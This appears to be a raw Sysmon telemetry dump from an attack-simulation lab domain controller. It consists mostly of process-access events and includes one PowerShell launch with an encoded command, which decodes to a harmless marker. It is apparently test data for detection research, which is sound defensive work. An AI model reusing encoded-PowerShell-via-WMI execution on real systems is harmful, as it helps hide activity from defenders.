16:53:44.375{05ADC7E1-229F-6039-1600-00000000AD01}15401572C:\Windows\system32\svchost.exe{05ADC7E1-6D98-603E-95AA-00000000AD01}6528C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002238551Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.357{05ADC7E1-229F-6039-0C00-00000000AD01}5888240C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002238550Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.357{05ADC7E1-229F-6039-0C00-00000000AD01}5888240C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002238549Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.357{05ADC7E1-229F-6039-0C00-00000000AD01}5888240C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002238548Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.357{05ADC7E1-229F-6039-0C00-00000000AD01}5888240C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002238547Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.357{05ADC7E1-229D-6039-0500-00000000AD01}636752C:\Windows\system32\csrss.exe{05ADC7E1-6D98-603E-99AA-00000000AD01}11584C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000002238546Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.357{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6D98-603E-99AA-00000000AD01}11584C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|C:\Windows\system32\wbem\cimwin32.dll+3adce|C:\Windows\system32\wbem\cimwin32.dll+3d475|C:\Windows\system32\wbem\cimwin32.dll+3ab15|C:\Windows\system32\wbem\cimwin32.dll+3b393|C:\Windows\system32\wbem\cimwin32.dll+3bb40|C:\Windows\SYSTEM32\framedynos.dll+20256|C:\Windows\SYSTEM32\framedynos.dll+218b5|C:\Windows\system32\wbem\wmiprvse.exe+1704a|C:\Windows\system32\wbem\wmiprvse.exe+1724f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4 154100x80000000000000002238545Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.371{05ADC7E1-6D98-603E-99AA-00000000AD01}11584C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXEpowershell.exe /NoProfile /Enco VwByAGkAdABlAC0ASABvAHMAdAAgADEANwAzADkANQBiADgAZgAtADYAMABiAGMALQA0ADUAZABiAC0AYgAwAGQANgAtAGQANwBlADEAOQBiADcAOQA5AGUAMQA0AA==C:\Windows\system32\ATTACKRANGE\Administrator{05ADC7E1-29F1-6039-B11D-350000000000}0x351db12HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{05ADC7E1-6D63-603E-6BAA-00000000AD01}6344C:\Windows\System32\wbem\WmiPrvSE.exeC:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding 11241100x80000000000000002238544Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.357{05ADC7E1-6D98-603E-97AA-00000000AD01}13564C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_ssbrgeuc.jh4.ps12021-03-02 16:53:44.357 10341000x80000000000000002238543Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.342{05ADC7E1-229F-6039-0C00-00000000AD01}5888240C:\Windows\system32\svchost.exe{05ADC7E1-6D98-603E-97AA-00000000AD01}13564C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002238542Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.342{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6D98-603E-98AA-00000000AD01}10664C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238541Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.342{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6D98-603E-97AA-00000000AD01}13564C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238540Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.342{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6D98-603E-96AA-00000000AD01}6924C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238539Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.342{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6D98-603E-95AA-00000000AD01}6528C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238538Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.342{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6D98-603E-94AA-00000000AD01}15412C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238537Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.342{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6D98-603E-93AA-00000000AD01}13748C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238536Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.342{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6CB1-603E-35AA-00000000AD01}14828C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238535Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.326{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6CB1-603E-34AA-00000000AD01}11696C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238534Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.326{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6CAF-603E-33AA-00000000AD01}8188C:\Windows\system32\DllHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238533Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.326{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-64FC-603E-3AA9-00000000AD01}15352C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238532Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.326{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-64C0-603E-31A9-00000000AD01}7648C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238531Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.326{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6394-603E-0CA9-00000000AD01}10840C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238530Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.326{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6358-603E-03A9-00000000AD01}5868C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238529Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 